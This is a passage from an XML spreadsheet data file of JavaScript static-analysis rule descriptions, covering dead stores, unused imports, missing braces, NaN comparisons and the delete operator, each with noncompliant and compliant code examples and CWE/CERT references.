    <t>&lt;p&gt;A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value\nonly to then overwrite it or throw it away, could indicate a serious error in the code. Even if it's not an error, it is at best a waste of resources.\nTherefore all calculated values should be used.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\ni = a + b; // Noncompliant; calculation result not used before value is overwritten\ni = compute();\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\ni = a + b;\ni += compute();\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;This rule ignores initializations to -1, 0, 1, &lt;code&gt;null&lt;/code&gt;, &lt;code&gt;undefined&lt;/code&gt;, [], {}, &lt;code&gt;true&lt;/code&gt;, &lt;code&gt;false&lt;/code&gt; and\n&lt;code&gt;""&lt;/code&gt;. Variables that start with an underscore (e.g. '&lt;code&gt;_unused&lt;/code&gt;') are ignored.&lt;/p&gt;\n&lt;p&gt;This rule also ignores variables declared with object destructuring using rest syntax (used to exclude some properties from object):&lt;/p&gt;\n&lt;pre&gt;\nlet {a, b, ...rest} = obj; // 'a' and 'b' are ok\ndoSomething(rest);\n\nlet [x1, x2, x3] = arr;    // but 'x1' is noncompliant, as omitting syntax can be used: "let [, x2, x3] = arr;"\ndoSomething(x2, x3);\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/563.html"&gt;MITRE, CWE-563&lt;/a&gt; - Assignment to Variable without Use ('Unused Variable') &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/QYA5"&gt;CERT, MSC13-C.&lt;/a&gt; - Detect and remove unused values &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/uQCSBg"&gt;CERT, MSC56-J.&lt;/a&gt; - Detect and remove superfluous code and values &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Just because you &lt;em&gt;can&lt;/em&gt; do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.&lt;/p&gt;\n&lt;p&gt;Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction getReadableStatus(job) {\n  return job.isRunning() ? "Running" : job.hasErrors() ? "Failed" : "Succeeded ";  // Noncompliant\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction getReadableStatus(job) {\n  if (job.isRunning()) {\n    return "Running";\n  }\n  return job.hasErrors() ? "Failed" : "Succeeded";\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1481</t>
  </si>
  <si>
    <t>&lt;p&gt;If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction numberOfMinutes(hours) {\n  var seconds = 0;   // seconds is never used\n  return hours * 60;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction numberOfMinutes(hours) {\n  return hours * 60;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;There's no reason to import modules you don't use; and every reason not to: doing so needlessly increases the load.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nimport A from 'a';      // Noncompliant, A isn't used\nimport { B1 } from 'b';\n\nconsole.log(B1);\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nimport { B1 } from 'b';\n\nconsole.log(B1);\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1121</t>
  </si>
  <si>
    <t>&lt;p&gt;Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif ((str = cont.substring(pos1, pos2)) != '') { // Noncompliant\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/481.html"&gt;MITRE, CWE-481&lt;/a&gt; - Assigning instead of Comparing &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/nYFtAg"&gt;CERT, EXP45-C.&lt;/a&gt; - Do not perform assignments in selection statements &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/1gCTAw"&gt;CERT, EXP51-J.&lt;/a&gt; - Do not perform assignments in conditional expressions\n  &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Extra semicolons (&lt;code&gt;;&lt;/code&gt;) are usually introduced by mistake, for example because:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; It was meant to be replaced by an actual statement, but this was forgotten. &lt;/li&gt;\n  &lt;li&gt; There was a typo which lead the semicolon to be doubled, i.e. &lt;code&gt;;;&lt;/code&gt;. &lt;/li&gt;\n  &lt;li&gt; There was a misunderstanding about where semicolons are required or useful. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar x = 1;; // Noncompliant\n\nfunction foo() {\n};  // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar x = 1;\n\nfunction foo() {\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/NYA5"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never\n  executed &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/7gCTAw"&gt;CERT, MSC51-J.&lt;/a&gt; - Do not place a semicolon immediately following an if, for,\n  or while condition &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/i4FtAg"&gt;CERT, EXP15-C.&lt;/a&gt; - Do not place a semicolon on the same line as an if, for,\n  or while statement &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Curly braces can be omitted from a one-line block, such as with an &lt;code&gt;if&lt;/code&gt; statement or &lt;code&gt;for&lt;/code&gt; loop, but doing so can be\nmisleading and induce bugs.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when the whitespacing of the lines after a one line block indicates an intent to include those lines in the block, but\nthe omission of curly braces means the lines will be unconditionally executed once.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (condition)\n  firstActionInBlock();\n  secondAction();  // Noncompliant; executed unconditionally\nthirdAction();\n\nif (condition) firstActionInBlock(); secondAction();  // Noncompliant; secondAction executed unconditionally\n\nif (condition) firstActionInBlock();  // Noncompliant\n  secondAction();  // Executed unconditionally\n\nif (condition); secondAction();  // Noncompliant; secondAction executed unconditionally\n\nlet str = undefined;\nfor (let i = 0; i &amp;lt; array.length; i++)\n  str = array[i];\n  doTheThing(str);  // Noncompliant; executed only on last array element\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (condition) {\n  firstActionInBlock();\n  secondAction();\n}\nthirdAction();\n\nlet str = undefined;\nfor (let i = 0; i &amp;lt; array.length; i++) {\n  str = array[i];\n  doTheThing(str);\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/483.html"&gt;MITRE, CWE-483&lt;/a&gt; - Incorrect Block Delimitation &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/3wHEAw"&gt;CERT, EXP52-J.&lt;/a&gt; - Use braces for the body of an if, for, or while statement\n  &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1110</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of parentheses, even those not required to enforce a desired order of operations, can clarify the intent behind a piece of code. But\nredundant pairs of parentheses could be misleading, and should be removed. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet x = (y / 2 + 1);   //Compliant even if those parenthesis are useless for the compiler\n\nif (a &amp;amp;&amp;amp; ((x+y &amp;gt; 0))) {  // Noncompliant\n  //...\n}\n\nreturn ((x + 1));  // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nlet x = (y / 2 + 1);\n\nif (a &amp;amp;&amp;amp; (x+y &amp;gt; 0)) {\n  //...\n}\n\nreturn (x + 1);\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When the call to a function doesn't have any side effects, what is the point of making the call if the results are ignored? In such case, either\nthe function call is useless and should be dropped or the source code doesn't behave as expected. &lt;/p&gt;\n&lt;p&gt;To prevent generating any false-positives, this rule triggers an issues only on a predefined list of known objects &amp;amp; functions. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\n'hello'.lastIndexOf('e'); // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nlet char = 'hello'.lastIndexOf('e');\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/9YIRAQ"&gt;CERT, EXP12-C.&lt;/a&gt; - Do not ignore values returned by functions &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/9gEqAQ"&gt;CERT, EXP00-J.&lt;/a&gt; - Do not ignore values returned by methods &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;NaN&lt;/code&gt; is not equal to anything, even itself. Testing for equality or inequality against &lt;code&gt;NaN&lt;/code&gt; will yield predictable results,\nbut probably not the ones you want. &lt;/p&gt;\n&lt;p&gt;Instead, the best way to see whether a variable is equal to &lt;code&gt;NaN&lt;/code&gt; is to use &lt;code&gt;Number.isNaN()&lt;/code&gt;, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since &lt;code&gt;NaN !== NaN&lt;/code&gt;, when &lt;code&gt;a !== a&lt;/code&gt;, you know it must equal &lt;code&gt;NaN&lt;/code&gt;.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar a = NaN;\n\nif (a === NaN) {  // Noncompliant; always false\n  console.log("a is not a number");  // this is dead code\n}\nif (a !== NaN) { // Noncompliant; always true\n  console.log("a is not NaN"); // this statement is not necessarily true\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (Number.isNaN(a)) {\n  console.log("a is not a number");\n}\nif (!Number.isNaN(a)) {\n  console.log("a is not NaN");\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/7AEqAQ"&gt;CERT, NUM07-J.&lt;/a&gt; - Do not attempt comparisons with NaN &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The comma operator takes two expressions, executes them from left to right and returns the result of the second one. Use of this operator is\ngenerally detrimental to the readability and reliability of code, and the same effect can be achieved by other means.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\ni = a += 2, a + b;  // What's the value of i ?\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\na +=  2;\ni = a + b;\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Use of comma operator is tolerated:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; in initialization and increment expressions of &lt;code&gt;for&lt;/code&gt; loops. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;pre&gt;\nfor(i = 0, j = 5; i &amp;lt; 6; i++, j++) { ... }\n&lt;/pre&gt;\n&lt;ul&gt;\n  &lt;li&gt; If the expression sequence is explicitly wrapped in parentheses. &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; It can significantly impair the readability of the code. &lt;/li&gt;\n  &lt;li&gt; It introduces additional side effects into a statement, with the potential for undefined behavior. &lt;/li&gt;\n  &lt;li&gt; It is safer to use these operators in isolation from any other arithmetic operators. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nu8a = ++u8b + u8c--;\nfoo = bar++ / 4;\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;p&gt;The following sequence is clearer and therefore safer:&lt;/p&gt;\n&lt;pre&gt;\n++u8b;\nu8a = u8b + u8c;\nu8c--;\nfoo = bar / 4;\nbar++;\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/ZwE"&gt;CERT, EXP30-C.&lt;/a&gt; - Do not depend on the order of evaluation for side effects\n  &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/fYAyAQ"&gt;CERT, EXP50-CPP.&lt;/a&gt; - Do not depend on the order of evaluation for side\n  effects &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/yQC7AQ"&gt;CERT, EXP05-J.&lt;/a&gt; - Do not follow a write by a subsequent write or read of the\n  same object within an expression &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When only the condition expression is defined in a &lt;code&gt;for&lt;/code&gt; loop, and the initialization and increment expressions are missing, a\n&lt;code&gt;while&lt;/code&gt; loop should be used instead to increase readability. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (;condition;) { /*...*/ }\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nwhile (condition) { /*...*/ }\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Using &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;break&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, and &lt;code&gt;continue&lt;/code&gt; from a &lt;code&gt;finally&lt;/code&gt; block overwrites similar\nstatements from the suspended &lt;code&gt;try&lt;/code&gt; and &lt;code&gt;catch&lt;/code&gt; blocks.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when a jump statement (&lt;code&gt;break&lt;/code&gt;, &lt;code&gt;continue&lt;/code&gt;, &lt;code&gt;return&lt;/code&gt; and &lt;code&gt;throw&lt;/code&gt;) would force\ncontrol flow to leave a &lt;code&gt;finally&lt;/code&gt; block. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo() {\n    try {\n        return 1; // We expect 1 to be returned\n    } catch(err) {\n        return 2; // Or 2 in cases of error\n    } finally {\n        return 3; // Noncompliant: 3 is returned before 1, or 2, which we did not expect\n    }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo() {\n    try {\n        return 1; // We expect 1 to be returned\n    } catch(err) {\n        return 2; // Or 2 in cases of error\n    }\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/584.html"&gt;MITRE, CWE-584&lt;/a&gt; - Return Inside Finally Block &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/mIEbAQ"&gt;CERT, ERR04-J.&lt;/a&gt; - Do not complete abruptly from a finally block &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;By convention, a file that exports only one class, function, or constant should be named for that class, function or constant. Anything else may\nconfuse maintainers.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\n// file path: myclass.js  -- Noncompliant\nclass MyClass {\n  // ...\n}\nexport default MyClass;\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\n// file path: MyClass.js\nclass MyClass {\n  // ...\n}\nexport default MyClass;\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Case, underscores ( &lt;code&gt;_&lt;/code&gt; ) and dashes (&lt;code&gt;-&lt;/code&gt;) are ignored from the name comparison.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Conditional expressions which are always &lt;code&gt;true&lt;/code&gt; or &lt;code&gt;false&lt;/code&gt; can lead to dead code. Such code is always buggy and should never\nbe used in production.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\na = false;\nif (a) { // Noncompliant\n  doSomething(); // never executed\n}\n\nif (!a || b) { // Noncompliant; "!a" is always "true", "b" is never evaluated\n  doSomething();\n} else {\n  doSomethingElse(); // never executed\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;This rule will not raise an issue in either of these cases:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; When the condition is a single &lt;code&gt;const&lt;/code&gt; of boolean value &lt;/li&gt;\n&lt;/ul&gt;\n&lt;pre&gt;\nconst debug = false;\n//...\nif (debug) {\n  // Print something\n}\n&lt;/pre&gt;\n&lt;ul&gt;\n  &lt;li&gt; When the condition is the literal &lt;code&gt;0&lt;/code&gt;, &lt;code&gt;1&lt;/code&gt;, &lt;code&gt;true&lt;/code&gt; or &lt;code&gt;false&lt;/code&gt;. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;In these cases it is obvious the code is as intended.&lt;/p&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/570.html"&gt;MITRE, CWE-570&lt;/a&gt; - Expression is Always False &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/571"&gt;MITRE, CWE-571&lt;/a&gt; - Expression is Always True &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/NYA5"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never\n  executed &lt;/li&gt;\n&lt;/ul&gt;\n&lt;!-- Make sure to not drop this deprecation section when doing bulk update (as well as updating S2583.json)  --&gt;\n&lt;!-- This rule is deprecated only for JS language, that's why we can't deprecate it in RSPEC --&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1131</t>
  </si>
  <si>
    <t>&lt;p&gt;Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same\nfile.&lt;/p&gt;\n&lt;p&gt;If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\n// The following string will error if there is a whitespace after '\'\nvar str = "Hello \\nWorld";\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (a) {\n  if (a) { // Noncompliant\n    doSomething();\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (a) {\n  if (b) {\n    doSomething();\n  }\n}\n\n// or\nif (a) {\n  doSomething();\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/571"&gt;MITRE, CWE-571&lt;/a&gt; - Expression is Always True &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/570"&gt;MITRE, CWE-570&lt;/a&gt; - Expression is Always False &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S122</t>
  </si>
  <si>
    <t>&lt;p&gt;For better readability, do not put more than one statement on a single line.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfoo(); bar(); // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfoo();\nbar();\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;It is highly suspicious when a value is saved for a key or index and then unconditionally overwritten. Such replacements are likely in error.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\n fruits[1] = "banana";\n fruits[1] = "apple";  // Noncompliant - value on index 1 is overwritten\n\n myMap.set("key", 1);\n myMap.set("key", 2); // Noncompliant - value for key "key" is replaced\n\n mySet.add(1);\n mySet.add(1); // Noncompliant - element is already in the set\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Multiple imports from the same module should be merged together to improve readability.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nimport { B1 } from 'b';\nimport { B2 } from 'b'; // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nimport { B1, B2 } from 'b';\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When two functions have the same implementation, either it was a mistake - something else was intended - or the duplication was intentional, but\nmay be confusing to maintainers. In the latter case, the code should be refactored.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction calculateCode() {\n  doTheThing();\n  doOtherThing();\n  return code;\n}\n\nfunction getName() {  // Noncompliant\n  doTheThing();\n  doOtherThing();\n  return code;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction calculateCode() {\n  doTheThing();\n  doOtherThing();\n  return code;\n}\n\nfunction getName() {\n  return calculateCode();\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Functions with fewer than 3 lines are ignored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;delete&lt;/code&gt; operator can be used to remove a property from any object. Arrays are objects, so the &lt;code&gt;delete&lt;/code&gt; operator can be\nused here too, but if it is, a hole will be left in the array because the indexes/keys won't be shifted to reflect the deletion. &lt;/p&gt;\n&lt;p&gt;The proper method for removing an element at a certain index would be:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.splice&lt;/code&gt; - add/remove elements from the array &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.pop&lt;/code&gt; - add/remove elements from the end of the array &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.shift&lt;/code&gt; - add/remove elements from the beginning of the array &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2];  // Noncompliant. myArray =&amp;gt; ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); // expected value was 'd' but output is undefined\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar myArray = ['a', 'b', 'c', 'd'];\n\n// removes 1 element from index 2\nremoved = myArray.splice(2, 1);  // myArray =&amp;gt; ['a', 'b', 'd']\nconsole.log(myArray[2]); // outputs 'd'\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The semantics of the &lt;code&gt;delete&lt;/code&gt; operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar x  = 1;\ndelete x;       // Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo;  // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar obj = {\n  x:1,\n  foo: function(){\n  ...\n  }\n};\ndelete obj.x;\ndelete obj.foo;\n\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Both &lt;code&gt;arguments.caller&lt;/code&gt; and &lt;code&gt;arguments.callee&lt;/code&gt; make quite a few optimizations impossible so they were deprecated in latest\nversions of JavaScript. In fact, EcmaScript 5 forbids the use of both in &lt;code&gt;strict&lt;/code&gt; mode, according to the docs:&lt;/p&gt;\n&lt;blockquote&gt;\n  Arguments objects for strict mode functions define non-configurable accessor properties named "caller" and "callee" which throw a TypeError\n  exception on access.\n&lt;/blockquote&gt;\n&lt;p&gt;The same restriction applies to the function's &lt;code&gt;caller&lt;/code&gt; and &lt;code&gt;arguments&lt;/code&gt; properties in &lt;code&gt;strict&lt;/code&gt; mode.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction whoCalled() {\n   if (arguments.caller == null)   //Noncompliant\n      console.log('I was called from the global scope.');\n   else\n      console.log(arguments.caller + ' called me!');  // Noncompliant\n\n  console.log(whoCalled.caller);  // Noncompliant\n  console.log(whoCalled.arguments);  // Noncompliant\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;new&lt;/code&gt; keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n&lt;code&gt;TypeError&lt;/code&gt; because there won't be a constructor function for the &lt;code&gt;new&lt;/code&gt; keyword to invoke.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass;    // Noncompliant;\nvar obj2 = new MyClass();    // Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\n/**\n * @constructor\n */\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = function(){\n  this.prop = 1;\n}\n\nvar obj1 = new someClass;  // Compliant\nvar obj2 = new MyClass();  // Compliant regardless of considerJSDoc value\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;void&lt;/code&gt; operator evaluates its argument and unconditionally returns &lt;code&gt;undefined&lt;/code&gt;. It can be useful in pre-ECMAScript 5\nenvironments, where &lt;code&gt;undefined&lt;/code&gt; could be reassigned, but generally, its use makes code harder to understand.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvoid (function() {\n   ...\n}());\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\n(function() {\n   ...\n}());\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;No issue is raised when &lt;code&gt;void 0&lt;/code&gt; is used in place of &lt;code&gt;undefined&lt;/code&gt;. &lt;/p&gt;\n&lt;pre&gt;\nif (parameter === void 0) {...}\n&lt;/pre&gt;</t>
  </si>
  <si>
